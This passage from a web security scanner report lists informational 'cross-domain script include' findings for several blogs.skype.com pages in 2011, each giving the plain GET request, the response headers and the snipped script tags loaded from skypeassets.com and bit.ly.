<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.87. http://blogs.skype.com/en/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/advertising/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/advertising/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 80983
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.88. http://blogs.skype.com/en/android/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/android/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/android/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 104201
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.89. http://blogs.skype.com/en/apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/apps/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/apps/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:58 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 240757
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.90. http://blogs.skype.com/en/blackberry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/blackberry/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/blackberry/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:59 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 67973
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.91. http://blogs.skype.com/en/brew/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/brew/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/brew/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54209
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.92. http://blogs.skype.com/en/campaigns_and_promotions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/campaigns_and_promotions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/campaigns_and_promotions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 175514
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.93. http://blogs.skype.com/en/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/careers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/careers/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 65154
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.94. http://blogs.skype.com/en/comments.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/comments.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/comments.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:54 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57205
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sky
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.95. http://blogs.skype.com/en/corporate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/corporate/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/corporate/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 169222
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.96. http://blogs.skype.com/en/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/education/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/education/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 70824
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.97. http://blogs.skype.com/en/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/enterprise/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/enterprise/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.98. http://blogs.skype.com/en/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/entertainment/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:06 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59910
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.99. http://blogs.skype.com/en/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/events/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/events/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 115014
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.100. http://blogs.skype.com/en/facebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/facebook/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:08 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 96175
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.101. http://blogs.skype.com/en/html-guide.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/html-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/html-guide.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:55 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sky
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
